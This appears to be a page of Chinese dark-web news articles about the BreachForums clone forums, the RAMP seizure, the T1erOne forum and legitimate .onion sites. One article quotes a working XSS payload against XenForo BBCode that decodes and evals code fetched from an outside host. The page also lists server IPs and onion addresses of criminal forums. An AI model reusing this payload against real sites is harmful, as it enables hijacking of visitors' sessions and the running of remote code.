本月初,“暗网下/AWX”曾报道,两个版本BreachForums论坛的多个明网域名遭执法机构查封。本月中旬,由Indra运营的暗网数据泄露论坛BreachForums遭遇了长期停机,明网网站无法正常访问,暗网网站提示“Onion site not found”。前端仍正常运行,但后端已无响应,基本可以确定其背后的基础设施出现了问题,而非黑客攻击或计划内维护。
虽然BreachForums管理层表示这只是例行维护,但据威胁情报专家猜测,可能有两项协同行动针对该论坛:一是由LAPSUS$与HasanBroker共同宣布的“Operation Lebensraum”联盟,明确以“抹除Indra及其BreachForums论坛”为目标;二是“网络反情报威胁调查联盟”(CCITIC),一家调查网络威胁以协助当局的非营利组织,该组织声称是他们攻击了Indra的BreachForums。
经“暗网下/AWX”长期坚持跟进与持续跟踪报道,可以看到BreachForums数据泄露论坛有着混乱的黑暗历史:多次遭FBI查封(2023–2025年)、大规模数据泄露(2026年1月有32.4万用户信息曝光)、疑似蜜罐的重新启动、多次域名被查封后重新启用新域名……自2022年以来,BreachForums历经多次FBI查封仍存活至今,每次被关停后都会更换顶级域名(.st ➡️ .cx ➡️ .is ➡️ .vc ➡️ .hn ➡️ .as…)。
这次不管是谁的努力,瘫痪了Indra的BreachForums论坛,则为其竞争对手HasanBroker版本的BreachForums论坛铺平了道路,该版本自诩为合法继承者,且正获得越来越多的支持。
“暗网下/AWX”继续追踪分析后基本确认,Indra版本BreachForums的关闭,既非黑客攻击,也非例行维护——而是被强制下线。网络反情报威胁调查联盟(CCITIC)成功关闭了Indra的BreachForums论坛,Indra被迫发布一则告别公告,但该公告目前已经不可见。
Indra的BreachForums论坛在CCITIC的持续努力与施压下关闭 根据CCITIC官网的介绍:
网络反情报威胁调查联盟(Cyber Counter-Intelligence Threat Investigation Consortium)是当今互联互通的数字环境中,抵御不断演变的网络威胁的一座协作堡垒。
本组织汇聚了网络安全专家、研究人员和分析师,共同构建统一的防御网络。依托自主研发的平台和集体智慧,我们在威胁危及关键基础设施之前,便能对其进行识别、分析并予以消除。
CCITIC宣告, BreachForums.as已下线——CCITIC成功将其击溃。其在领英上发文称,该域名breachforums[.]as是这个臭名昭著的网络犯罪论坛在明网上的最新版本,目前无法访问。这不是系统故障,而是被强制下线。
CCITIC表示,他们已成功定位到BreachForums背后的上游服务器,这些服务器均托管于DigitalOcean(ASN 14061)位于法兰克福数据中心的机房。随后,该组织提交了多份滥用报告(由于DigitalOcean要求每个 IP 地址提交一份报告,因此不得不提交了三份完全相同的报告),美国云服务提供商DigitalOcean终止了对这些服务器的服务。
🖥️ 已确认的服务器IP:
🔹 164.90.223.186 — 与 breachforums.as 域名直接关联
🔹 138.68.73.155
🔹 68.183.223.214
CCITIC于2026年3月6日扫描时,确定这些服务器拥有相同的技术指纹:WSGIServer/0.2、CPython/3.12.12、端口 3093、TLS 1.3。
2026年3月12日,CCITIC向DigitalOcean安全运营中心提交了滥用报告后,该托管服务商审查了CCITIC的报告,并对与BreachForums基础设施(breachforums[.]as)相关的账户采取了行动。
Indra发表告别信后选择转移资金退出 随后,访问Indra的BreachForums论坛,跳转至:https://breachforums[.]as/info/download.php,并显示一封告别公告:
亲爱的世界,
是时候向大家告别了——尽管并非彻底的告别。
BreachForums 早已不仅仅是一个平台;它是一个社区,在许多方面,更是一项你们每个人都理解并为此贡献力量的共同使命。
在过去的几个月里,我竭尽所能帮助这个社区重振旗鼓并日益壮大,我坚信这里所建立的一切将会继续存在并不断发展。
然而,此刻我必须退居二线。我个人生活中一些重要且迫切的事务需要我投入精力,其中包括一项新事业的启动。尽管如此,只要条件允许,我仍会尽我所能继续支持 BreachForums。
因此,我们现正寻找一位负责任的个人或团队,接手论坛的领导工作并提供持续支持。
现任版主团队将保持不变,并继续履行其一贯职责:Loki、Tanaka、888 和 Pine。
我们期待就论坛的未来展开严肃而认真的讨论。
如有兴趣,请通过以下渠道联系管理团队:
Session: 054d67e476285098efb2bbe770d205588b6639c5af9157edf138b630cd53109723
TOX:D1E8EB300080486048B366464BD5D57C86D6FA8234E784714541BAEAFB64FC6A7CCD72D7F819
— BreachForums 管理团队
RaidForums、BreachForums都是曾经臭名昭著的暗网数据泄露论坛,提供被盗数据发布与交易的平台。近些年,在美国联邦调查局、国际刑警组织、欧洲刑警组织等国际执法机构的努力下,几个暗网数据泄露论坛被打击了多次。
目前仍然还存在且在暗网与明网可以同时访问的暗网数据泄露论坛还剩:两个版本的BreachForums(Indra的BreachForums与Hasan的BreachForums)、BreachForums的最大竞争对手DarkForums,这些论坛除了面临竞争对手的挑战,还得面对在执法机构的查封压力。
近期,执法机构采取密集行动,查封了三个暗网数据泄露论坛的多个域名。随后这些论坛迅速响应,启用了新的明网域名。“暗网下/AWX”整理了这几个论坛的明网域名更迭记录。
Indra的BreachForums的明网域名更迭 2025年12月,在多个版本的BreachForums被执法机构摧毁后,Indra推出了新的BreachForums论坛,明网域名为breachforums[.]bf。
2026年2月4日,breachforums[.]bf域名遭受据称HasanBroker等的社会工程学攻击,被暂停解析,暂停期间,Indra的BreachForums迅速启用了新的明网域名breachforums[.]jp。后Indra设法找回了bf域名,并恢复使用了bf域名,随即jp域名被放弃使用。
2026年2月,安全研究人员多次研究出breachforums[.]bf的真实IP,分别为:95.129.233.76、185.129.102.34、31.172.87.150。
2026年2月14日,breachforums[.]bf域名再次被暂停解析,这次疑似是真被执法机构查封,并同时查封了breachforums[.]jp域名。
同日,Indra的BreachForums又一次迅速启用了新明网域名breachforums[.]as,并发布公告称,此次纯属注册商单方面暂停服务,与BreachForums内部运营无关,系统安全状态完好无损。未发生任何安全事件,未出现数据泄露,其基础设施、服务器及数据均未受影响。
Hasan的BreachForums的明网域名更迭 2026年1月,原BreachForums的管理员HasanBroker推出了另一个新的BreachForums,明网域名为breachforums[.]cz。2026年2月12日,有安全研究人员分析出该域名的子域名mail[.]breachforums[.]cz背后的真实IP为176.123.2.86。
2026年2月20日,breachforums[.]cz域名被执法机构查封,虽然依然能打开,但是访问时提示“Page could not be loaded”。在breachforums[.]cz域名被查封后,Hasan的BreachForums启用新明网域名breachforums[.]in为其主域名。
DarkForums的明网域名更迭 2025年,暗网出现一个新的数据泄露论坛DarkForums,成为BreachForums有力的竞争对手。DarkForums使用明网域名darkforums[.]st。
安全研究人员分析出了darkforums[.]st背后的IP:185.178.208.177,185.11.145.145, 185.11.145.254,185.196.9.155,85.208.156.120。
2025年12月,DarkForums启用新的明网域名darkforums[.]io,2026年1月,有安全研究者称该域名背后对应的真实IP有185.208.158.89、185.178.208.154。2026年2月4日,darkforums[.]io域名被执法机构查封,无法访问。
2026年2月4日,darkforums[.]io域名被查封后,DarkForums启用明网域名darkforums[.]me为主域名,该域名是DarkForums之前就持有的备用域名。当时DarkForums的所有者Knox发布带有PGP签名的论坛公告宣布“Official Domains – Old Mirrors Disabled”:
—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256
All previous domains and mirror links have been permanently disabled by the providers and are no longer active.
Please update your bookmarks. The only official addresses going forward are:
Clearnet: https://darkforums.me
Onion (Tor): http://darkfoxaqhfpxkrbt7vxns2z2u2k72sgmqbzeorupaiottw3ecm2wgyd.onion
We will announce and list any new mirrors here as they are added.
暗网(Dark Web)常常被视为互联网的“神秘禁区”,一提到它,许多人脑海中浮现的都是非法交易、黑客攻击等负面形象。但实际上,暗网只是互联网的一种特殊存在形式——它利用Tor网络提供更高的匿名性和抗审查能力。非法行为在明网(.com、net等普通网站)同样大量存在,暗网本身并非罪恶的代名词。
暗网最核心的价值在于保护隐私、绕过审查、支持言论自由。”暗网下/AWX“多次报道,许多知名机构、媒体和隐私服务提供商都推出了官方的.onion站点,正是为了让身处网络受限地区的人们也能安全获取信息、行使基本权利。
重要前提:如何安全访问暗网? 必须使用官方Tor浏览器(从 https://www.torproject.org 下载,支持Windows、macOS、Linux、Android、iOS)。 访问.onion网站本身在绝大多数国家/地区不违法,但在暗网上从事任何违法犯罪活动(如购买违禁品、参与黑产)都是严重犯罪,请务必远离。 暗网环境复杂多变,永远无法100%预知页面内容。强烈建议:不要随意点击不明链接、不下载未知文件、不输入真实个人信息、不进行任何金钱交易。 洋葱链接(.onion)非常长且容易被仿冒,访问前请多方核实来源(官网、维基百科、dark.fail 等可信镜像站),避免落入钓鱼陷阱。 10个老牌.onion网站 本文“暗网下/AWX”整理了2026年仍活跃、由正规机构/公司运营、以隐私保护或信息自由为目的的10个老牌.onion域名暗网网站及其暗网网址。这些暗网网站都是官方维护,没有访问与浏览风险,适合对隐私、新闻自由感兴趣的朋友了解和体验。
一、Tor Project 官方网站 http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/
Tor(The Onion Router,洋葱路由)是整个暗网生态的基石。由美国非营利组织The Tor Project开发维护,它通过多层加密和中继路由实现匿名通信。这是Tor项目自己的官方洋葱站点,你可以在这里获取最新版本的Tor浏览器、查看文档或了解项目进展。
二、DuckDuckGo https://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onion/
DuckDuckGo是全球知名的隐私优先搜索引擎,从不追踪用户、不存储搜索记录。它的.onion版本让用户在Tor网络内完成搜索,进一步降低IP泄露风险。
注意:它主要搜索的是明网内容,不会主动带你进入其他暗网站点,非常适合作为暗网内的“安全起手搜索引擎”。
三、The Hidden Wiki http://zqktlwiuavvvqqt4ybvgvi7tyo4hjl5xgfuvpdf6otjiycgwqbym2qad.onion/
The Hidden Wiki被誉为“暗网的维基百科”,是一个开放编辑的链接目录,按类别整理了大量.onion站点。它是许多人探索暗网的第一个落脚点。但请注意:其中混杂了各种链接,包括已失效的、欺诈的甚至非法的,因此仅作为暗网网址导航,供网友参考使用。
四、ProPublica http://p53lf57qovyuvwsc6xnrppyply3vtqm7l6pcobkmyqsiofyeznfu5uqd.onion/
ProPublica(普利策奖级调查新闻)是美国顶级非营利调查新闻机构,专注揭露权力滥用、腐败和系统性不公。因为其报道常触及敏感神经,该机构很早就建立了Tor洋葱站点,让记者、线人能在高度匿名的环境下交流和发布信息。在某些高压地区,这几乎是唯一能稳定阅读其深度报道的途径。
五、BBC News(英国广播公司) https://www.bbcnewsd73hkzno2ini43t4gblxvycyac5aw4gnv7t2rccijh7745uqd.onion/
英国广播公司(BBC)在Tor网络上托管了完整新闻站点。除了常规bbc.com的内容,在某些国家被封锁或审查的地区,这个.onion版本成为重要信息窗口,有时还会发布独家或未在明网露面的报道。
六、The New York Times(纽约时报) https://www.nytimesn7cgmftshazwhfgzm37qxb44r64ytbb2dj3x62d2lljsciiyd.onion/
《纽约时报》(The New York Times)同样提供官方Tor站点,支持匿名阅读和投稿。尤其对调查记者和身处新闻管制地区的读者而言,它极大降低了被追踪的风险,促进了更自由的信息流通。
七、Facebook(脸书) http://facebookwkhpilnemxj7asaniu7vnjjbiltxjqhye3mhbshg7kx5tfyd.onion/
早在2014年,Facebook就推出了官方.onion版本,主要服务于受网络封锁国家/地区的用户。通过Tor访问可以绕过地域限制,同时结合Tor本身的匿名性,更好地保护个人信息不被轻易泄露。
八、ProtonMail http://protonmailrmez3lotccipshtkleegetolb73fuirgj7r4o4vfu7ozyd.onion/
ProtonMail是全球公认最注重隐私的加密电子邮件服务,提供端到端加密、无日志政策。它的.onion版本允许用户在Tor网络内登录和管理邮箱,最大限度减少元数据泄露,是隐私爱好者的标配工具。
九、SecureDrop http://sdolvtfhatvsysc6l34d65ymdwxcujausv7k5jk4cy5ttzhjoi6fzvyd.onion/
SecureDrop(安全爆料系统)是由新闻自由基金会开发的开源匿名爆料平台,已被全球60多家顶级媒体采用(如《纽约时报》、《华盛顿邮报》、ProPublica、《卫报》、The Intercept等)。它专为举报人设计,确保提交文件和信息时发送者身份完全匿名,是现代 investigative journalism 的重要基础设施。
十、CIA(美国中央情报局) http://ciadotgov4sjwlzihbbgxnqg3xiyrg7so2r2o3lt5wz5ypk4sxyjstad.onion/
令许多人意外的是,美国中央情报局也运营着官方.onion站点。普通民众可以通过它匿名提交线索、查看公开情报或申请工作。Tor网络为其提供了额外的隐私保障层。
结语 暗网并非洪水猛兽,它更像一把双刃剑:用得好,能守护隐私与言论自由;用得不好,则可能带来严重法律风险。以上10个站点都是正规机构运营的入口,2026年仍被广泛认可为安全可靠的选择。
“暗网下/AWX”再次提醒:
只浏览、不下载、不交易、不泄露个人信息 定期更新Tor浏览器 最好搭配可靠的VPN进一步混淆流量(视个人需求) 希望这份暗网地址列表能让你更理性、安全地认识和接触暗网的一小部分合法面貌。
“暗网下/AWX”前期报道,臭名昭著的俄罗斯暗网论坛RAMP已经被FBI查封,RAMP曾是允许讨论勒索软件的暗网论坛,受到勒索软件团伙的欢迎。最新情报显示,RAMP的替代品已经出现,新暗网论坛的名称为“T1erOne”(也被称为TierOne、t1eron3、Tier1),可以同时通过暗网和明网进行访问。
近日,有安全研究人员club1337(@club31337)发布推文表示“Ramp已死,TierOne万岁”,并给出了新的T1erOne网站的暗网与明网域名。“暗网下/AWX”对该推文进行了核验,确认T1erOne网站的暗网与明网域名均可以访问:
T1erOne的暗网域名:jprrin6bqe3flvtpyxkt4zsmzc3u6vvn7ahgtcbul224w3xn4h3gawid[.]onion
T1erOne的明网域名:t1eron3[.]vip
Ramp is dead. Long live TierOne.https://t.co/akRDXrnJvahttps://t.co/dm8re9gWcU pic.twitter.com/pEh2aUb78M
— club1337 (@club31337) February 12, 2026 “暗网下/AWX”尝试访问T1erOne论坛,发现该网站主要提供了登录和注册功能。打开该网站,显示了一个简洁的登录界面,包括用户名、密码输入框,以及注册链接,没有复杂的交互或可见的外部资源加载。可以明确的是,与常规暗网论坛不同,新的T1erOne论坛并非使用常见的开源PHP论坛程序如phpBB、MyBB或SMF等进行搭建,可能系背后的管理员独立开发。
初步分析,T1erOne论坛采用了前后端分离的网站架构,还使用了Socket.IO技术来实现实时双向通信。其明网页面使用了Cloudflare的CDN服务,这可能为执法部门找到其背后的真实服务器IP提供便利。
T1erOne论坛注册不需要邮箱验证,但注册该网站以后,需要管理员进行认证,访问所有页面均跳转提示:
Этот форум только по закрытому входу. Чтобы попасть, надо скинуть свои другие форумные акк (Рехаб, хсс, эксплойт) или заплатить 450$ на БТЦ / XMR кошелёк. Message an admin | Напиши админу
(本论坛为私密论坛。如需访问,您必须发送您的其他论坛账号(Rehab、XSS、Exploit)或向BTC/XMR钱包支付450美元。联系管理员 | 给管理员写信。)
本站(anwangxia.com)经过对页面的解析,发现了其后端的部分API接口如下:
/api/auth/register /api/auth/login /api/public/banners/image/2 /api/auth/me /api/public/settings /api/notifications /api/messages/unread-count 安全研究人员认为T1erOne与此前RAMP的活动关联,并正在通过新的T1erOne论坛监控该组织,这表明网络犯罪分子的攻击行为不回停歇,勒索软件的侵扰仍将继续。T1erOne论坛接下来将如何发展以及会不会步RAMP后尘,“暗网下/AWX”将持续关注。
更多暗网新闻动态,请关注“暗网下/AWX”。
自从多次重启后的BreachForums论坛被FBI查封之后,暗网先后出现了两个名为BreachForums的论坛,一个是Indra的BreachForums[.]bf(管理员Indra与N/A),一个是Hasan的BreachForums[.]cz(管理员HasanBroker与breach3d)。这两个论坛的诞生注定会硝烟四起,BreachForums克隆论坛之间的一场战役正在打响。
“暗网下/AWX”此前跟踪报道,Indra的BreachForums[.]bf于2025年12月诞生,使用MyBB搭建,通过投放.fr域名数据库并伪造政府邮箱宣布论坛成立,宣称自己才是真正的官方BF论坛;Hasan的BreachForums[.]cz于2026年1月出现,使用XenForo搭建,称自己才是正统,目前已吸引逾1400名成员加入。
近期,这两个BreachForums论坛的战争进入了白日化阶段,先是BreachForums[.]bf域名被社会工程学攻击后被暂停,其次BreachForums[.]cz论坛也遭受了短时间的跨站脚本(XSS)漏洞攻击,整体而言,Hasan的BreachForums[.]cz略占上风。
BreachForums[.]bf域名丢失后又被找回 2月3日,BreachForums[.]bf域名突然被域名注册商暂停访问,其管理员N/A发布公告,紧急启动BreachForums[.]jp域名来替代访问。同时,Hasan在BreachForums[.]cz发布主题“Takedown of the Fake Clone”(拿下仿冒克隆),并表示正在使用SQL注入、跨站脚本、SSRF请求等诸多漏洞进行攻击。
2月8日,访问BreachForums[.]bf,显示异常的篡改消息以及倒计时,暗示该平台可能遭遇安全事件或系统入侵。界面显示了以下内容:公开倒计时、泄露的个人图像、提及涉嫌犯罪活动及执法部门的签名声明、与论坛常规运营通知无关的声明。
根据暗网研究专家IntelOps(@IntelOpsV3)发布的消息,有黑客窃取某西非国家政府邮箱后,通过社会工程手段诱使域名注册商暂停了BF域名。域名注册商将技术援助请求转交布基纳法索的ABDI机构作为主管当局寻求协助,但技术援助集体成功推动其采取行动。
据称,Hasan在该域名被删除后成功注册该域名,并在2月8日发布了篡改页面。但Indra最终说服注册商该举报属虚假信息,重新夺回BreachForums[.]bf域名控制权,并发布公告恢复该域名的使用。
BreachForums[.]cz网站被篡改后快速恢复 2月5日,BreachForums[.]cz网站曾遭遇了一次跨站脚本(XSS)漏洞攻击,短暂遭到篡改,疑似因为XenForo存在跨站脚本漏洞。Hasan发帖解释,该XSS漏洞可利用性源于XenForo解析BBcode的机制,属于原生漏洞即零日漏洞。
该Payload利用JavaScript的eval函数实现Base64编码的解码功能(部分依赖混淆性安全机制)。通过atob函数解码后,得到以下在鼠标悬停时触发的JavaScript有效载荷:
(async() => {
var u = "https://breachforums.pathetic.wtf/server.php?get=payload";
var r = await fetch(u);
var t = await r.text();
eval(t);
})() Payload如下:
'c': ['https://breachforums.pathetic.wtf/server.php', "[table width=\"100%' onmouseover='eval(atob("KGFzeW5jKCk9PnsgICAgIHZhciB1ID0gImh0dHBzOi8vYnJlYWNoZm9ydW1zLnBhdGhldGljLnd0Zi9zZXJ2ZXIucGhwP2dldD1wYXlsb2FkIjsgICAgIHZhciByID0gYXdhaXQgZmV0Y2godSk7ICAgICB2YXIgdCA9IGF3YWl0IHIudGV4dCgpOyAgICAgZXZhbCh0KTsgfSkoKQ=="))'\"] [tr][td]click here and you will be entered into the giveaway[/td][/tr] [/table]", 0x1, "credits giveawayy", 0x0, 0x1964, 'setTimeout', 0x2, "\n<head>\n <meta charset=\"utf-8\">\n <title>owned</title>\n <style>\n body { margin: 0; padding: 0; height: 100vh; background: #000; color: #ff00aa; font-family: 'Courier New', Courier, monospace; display: flex; align-items: center; justify-content: center; text-align: center; overflow: hidden; }\n .
在美国联邦调查局(FBI)的努力下,臭名昭著的俄罗斯暗网论坛RAMP的暗网和明网网站已被美国执法部门查封。RAMP,即“俄罗斯匿名市场”(Russian Anonymous Marketplace)的缩写,是一个以俄语为主的在线交易平台,自称是“唯一允许勒索软件存在的地方”,深受勒索软件即服务团伙、敲诈勒索者、初始访问经纪人和其他从事网络犯罪的不法分子青睐的
在其他一些论坛(例如XSS)被查封后,RAMP已成为少数几个仍能逍遥法外的网络犯罪论坛之一。XSS的领导人去年被欧洲刑警组织逮捕。这一真空使得RAMP成为传播勒索软件和其他网络威胁的人员买卖或交易产品和服务的主要场所之一。
美国联邦调查局 (FBI) 与佛罗里达州南区联邦检察官办公室和司法部计算机犯罪与知识产权部门协调,执行了此次查封行动。目前访问RAMP的暗网Tor域名(rampjcdlqvgkoz5oywutpo6ggl7g6tvddysustfl6qzhr5osr24xxqqd[.]onion)及其明网域名(ramp4u[.]io),两个域名显示内容完全相同,为一个醒目的页面,页面显示执法部门的横幅广告,上面写着:“本网站已被查封”,意味着FBI已接管RAMP的域名。
扣押横幅上写着,FBI与美国佛罗里达州南区检察官办公室和美国司法部(DoJ)计算机犯罪和知识产权科(CCIPS)合作查封了该网站。该通知还嘲讽了RAMP运营商,上面写着“勒索软件唯一允许的地方!”,并配上了一张俄罗斯卡通人物玛莎(俄罗斯热门儿童动画片《玛莎和熊》中眨眼的玛莎)眨眼的图片。这份扣押横幅上没有像其他类似行动那样印有任何其他国际执法机构的标志,只列出了FBI和司法部的印章,似乎强调本次查封是美国当局独立完成的。
经“暗网下/AWX”测试,RAMP明网网站的域名服务器(DNS)记录已经重定向到FBI经常用于打击非法活动的域名服务器:
Name Server: ns1.fbi.seized.gov
Name Server: ns2.fbi.seized.gov 由于RAMP的暗网域名也被查封,本站(anwangxia.com)认为,FBI应已获取了RAMP论坛用户数据库和其他敏感的网站信息,如电子邮件地址、IP地址、私人消息和其他可能构成犯罪证据的信息,也就意味着经常访问与使用该网站的用户可能会被执法部门追踪到。
目前尚无任何关于RAMP运营者或用户被捕或拘留的消息。查封通知邀请公众通过FBI的IC3门户网站提交线索。
RAMP的查封行动与此前针对其他网络犯罪论坛的类似行动相呼应,表明执法部门正持续努力打击犯罪基础设施。虽然官方尚未确认任何逮捕行动,但此次行动凸显了勒索软件即服务(RaaS)运营及其相关生态系统面临的日益严峻的压力。
RAMP宣称是唯一允许勒索软件传播的暗网论坛 RAMP于2012年创建,最初是一个运行在Tor网络上的暗网网站,但直到2021年才开始声名鹊起,其运营者与现已解散的Babuk勒索软件团伙有关联。RAMP论坛目前的形态是在XSS和Exploit(俄罗斯网络犯罪领域两大主要暗网论坛)以及英语论坛BreachForums禁止讨论勒索软件之后形成的。
RAMP(俄罗斯匿名市场)宣称是暗网上唯一能允许勒索软件的论坛,该平台服务于俄语、中文和英语用户,拥有超过14000名注册用户,尤其受到勒索软件组织及其附属机构的青睐。所有用户在注册前都经过严格审核,或支付500美元匿名参与。该论坛提供讨论组、网络攻击教程以及恶意软件和服务市场。其首席管理员表示,该网站在2024年的年收入为25万美元。
RAMP最初旨在连接勒索软件运营者、关联方和中间商,如今已发展成为勒索软件生态系统的核心枢纽,成为威胁行为者协作、招募和交易的场所。目前RAMP不仅仅是一个交流平台,它更是一个勒索软件市场,DragonForce、Qilin、Medusa、GLOBAL Group、Eldorado和LockBit等勒索软件团伙都在此活跃。这些团伙积极招募技术娴熟的成员,宣传新的勒索软件变种,并共享行动情报,所有这些都是为了扩大自身的影响力和能力。
RAMP论坛的管理员中有一位名叫米哈伊尔·马特维耶夫(Mikhail Matveev)的俄罗斯公民,他也使用过Orange、Wazawaka和BorisElcin等化名,他于2022年表示,已经该论坛的所有权将转移给一位名叫“Stallman”的黑客。马特维耶夫于2024年在俄罗斯被捕。
2023年,马特维耶夫因参与多起勒索软件攻击活动(包括Babuk、LockBit和Hive)而被美国司法部起诉,这些攻击的目标是美国医疗保健机构、执法机构和其他关键基础设施。他还受到美国财政部外国资产控制办公室的制裁,并被列入联邦调查局的通缉名单,美国国务院悬赏高达1000万美元,征集能够逮捕或定罪他的信息。
网名为“Stallman”的黑客在RAMP论坛被关闭时仍然是该论坛的管理员,网络安全情报显示,Stallman“在维护信任、执行规则和管理平台的技术运营方面发挥了核心作用”。
在被查封后,情报公司Red Sense的联合创始人Yelisey Bohuslavskiy在LinkedIn上发帖解释说,RAMP是由与俄罗斯安全部门关系密切的人员创建的,目的是为了应对勒索软件即服务(RaaS)的蔓延。
他表示,直到2020年,俄罗斯、白俄罗斯和乌克兰的执法部门对Ryuk、Conti、REvil、Maze、Ragnar、Netwalker等传统且组织严密的网络犯罪集团都有很强的可见性。
“这种可见性部分来自于安全相关管理员对漏洞利用和跨站脚本攻击的控制。随后,RaaS(风险即服务)呈爆炸式增长。这种模式失控地蔓延:甚至论坛管理员也对关联方完全没有控制权。而RAMP正是为了解决这个问题而开发的,”他补充道。
据专家称,RAMP是新兴的、中低层级的勒索软件组织宣传自身、提供服务并“尽可能提高知名度”的主要中心。
Flare的高级威胁情报研究员Tammy Harper将RAMP描述为“网络犯罪生态系统中最值得信赖的勒索软件相关论坛之一”。
她解释说,该平台“被广泛认为是一个高度可信的托管环境”,并且是勒索软件运营商、中间人和关联方的主要讨论中心。
CybaVerse的安全运营中心 (SOC) 经理Ben Clarke解释说,RAMP成功的原因是“它为犯罪分子提供了一个支持整个攻击链的市场,从购买被盗凭证、推广恶意软件到出售和购买勒索软件服务。”
据了解,包括LockBit、ALPHV/BlackCat、Conti、DragonForce、Qilin、Nova、Radiant和RansomHub在内的许多臭名昭著的勒索软件组织都曾在不同时期在这个论坛上活动过。
Stallman承认FBI已经控制RAMP论坛,暂无重建计划 THE RAMP ADMINISTRATOR CONFIRMED THE ATTACK. A user with the nickname Stallman on the forum XSS confirmed that the forum administration had lost control. Here is the text of the statement: To whom it may concern.
自从后缀为bf的新BreachForums出现后,原BreachForums的管理员HasanBroker一直表示该BreachForums(breachforums[.]bf)系冒牌货,并称自己将努力恢复真正的BreachForums,并重塑辉煌。终于在1月17日,HasanBroker在其Telegram频道宣布了另一个新BreachForums的诞生,开放邀请大家注册。
“暗网下/AWX”看到,HasanBroker创建的BreachForums是基于论坛程序XenForo搭建的,而传统的BreachForums都是使用论坛程序MyBB,或许是由于MyBB可能存在一些不确定漏洞的缘故。
HasanBroker的新版本BreachForums明网与暗网地址如下:
明网地址:breachforums[.]cz
暗网地址:http://breach5yz2b5lepmq4gaqwcon3jippw3bislhvvdavem5git55sy2nid[.]onion
在宣布该新BreachForums(breachforums[.]cz)成立的公告中,HasanBroker宣称,BreachForums已经不复存在,支离破碎,影响力日渐式微。如今剩下的只有噪音、诱饵陷阱和那些试图取代昔日辉煌的平台。该新论坛旨在重建一个专注于信息、技术讨论和社区驱动的交流空间,摒弃一切浮夸作秀、虚假承诺和虚伪伪装。
HasanBroker称,他无意改写历史,也并非觊觎从未正式传承的头衔。这无关所有权,而是关乎方向。他们将回归这些论坛的初心:赚钱、恶搞、突袭、数据泄露、数据交易,以及最重要的——享受乐趣。
HasanBroker表示,注册受到严格限制。所有申请均需人工审核,审核标准包括:
展现出的操作意识 行为规范且具备常识 HasanBroker提醒道,不使用Gmail等邮箱就能很好地证明这一点,并举例说cock.li是一个不错的隐私选择。
HasanBroker承诺新BreachForums保持匿名,并致力于最大限度地减少不必要的曝光。他们已采取措施规避不记录IP地址的问题,并从论坛软件中彻底移除了该功能。目前,他们仅通过服务器日志记录IP地址,以防止DDoS攻击,但无法追踪到目标用户,且日志每天都会被删除。
HasanBroker要求使用VPN或Tor浏览器访问他的新BreachForums
最后,HasanBroker宣布:
如果您想恶意捣乱、攻击或制造全球性事件——这里正是您理想的去处。
如果您正在寻找一个重视谨慎、贡献和持续性的社区——欢迎您。
愿上帝保佑我们的论坛,消灭它的敌人。
BreachForums万岁!
此外,HasanBroker在Telegram频道表示,虽然随着所有重要工作的完成,新BreachForums论坛已搭建完成正式上线,但还会有更多的更新,如SMTP服务器还需要时间完善,注册采用手动审核机制,不过这部分问题不算太严重。太阳已在BreachForums论坛升起,照亮了那些骗子。
HasanBroker称在Telegram和其他平台上的活跃度将相对减少,专门使用BreachForums进行数据交易等,除非情况发生变化。接下来几天将添加Shoutbox和Escrow功能。HasanBroker提醒,无论多么有吸引力,切勿让任何平台剥夺您的操作安全权利。始终使用VPN或Tor,如果担心后门,可以两者都用。
近2天的Telegram频道公告发布了该论坛的更新,将Tor图标移至Clearnet主界面(此前图标显示位置错误,即使用户退出Tor网络,图标仍会保留),升级后相关问题已得到解决。另外,HasanBroker宣布了接下来将要开发的功能或者将要进行的活动:
完整的托管系统 向我们的成员颁发奖励 可能的赠品活动 ShinyHunters和其他团体发布的高质量数据 广告系统 喊话箱 对于“广告系统”,HasanBroker解释道,每个横幅将是一个N/A模板,直到有人决定为其支付1000积分,这些积分可以通过活跃度获得或支付35欧元。一旦你这样做,它将进入审批队列,并可以由工作人员接受——如果被拒绝,你将获得积分返还,并且可以再次申请。常见问题将显示你需要避免的审批事项。
对于“托管系统”,HasanBroker解释道,每个人都知道托管是如何运作的,它是任何论坛的重要结构,尤其是像BreachForums这样的论坛——你提交你的数据,买家提交资金,当双方都批准时,交易发生,否则,资金将自动从任一方退回。
对于“喊话箱”,HasanBroker解释道,虽然有点晚,但他们正在重新设计在MyBB软件上使用的原始喊话箱,但由于新BreachForums使用的是XenForo,设计上有些不同,它将很快发布,比之前的系统快得多。
经测试,截止发稿,从零开始的新BreachForums论坛的注册用户已经250多人,帖子数目60多篇,活跃度渐增,发展势头很明显。HasanBroker的新BreachForums(breachforums[.]cz)是否能够超越或者替代Indra的新BreachForums(breachforums[.]bf),FBI等执法部门对此后起之秀是否有新的执法行动,“暗网下/AWX”将持续关注。
更多暗网新闻动态,请关注“暗网下/AWX”。
Dump[.]li是一个极其简便、注重隐私的免费在线共享服务,支持匿名图片共享功能,同时兼具文本粘贴板功能。该网站提供暗网访问入口,同时支持Tor洋葱地址和I2P地址访问,受到追求极致隐私的用户的欢迎。
由于免费使用,Dump[.]li靠广告盈利,并接受加密货币捐赠,网站页面的底部提供了接受捐赠的XMR(门罗币)地址:monero:85gb3vtKjtRRYHAWrpVtVPKwsyE4A1iko6rAcXiKBphP1MZuJ2vgMtkZJJbpF35ursQjqztmoD9yWckZs6xaSp8C56SQahU
虽然Dump[.]li是匿名在线服务,非常受隐私党、极简主义者、以及喜欢在论坛、Telegram、X等社交平台发图但又不想被追踪的匿名人士欢迎,但Dump[.]li同时宣称遵守国际法律,禁止滥用。网站提供了邮箱([email protected]),发送邮件告知文件名及原因则可以视情删除图片。
Dump[.]li的自我介绍 “暗网下/AWX”看到,Dump[.]li网站的description标签中进行了自我介绍,内容如下:免费服务,可匿名上传和分享图片及文本。支持创建相册、粘贴文本链接。无需JavaScript。(Free service that lets you upload and share images and text online anonymously. You can create albums, pastebin links. No Javascript.)
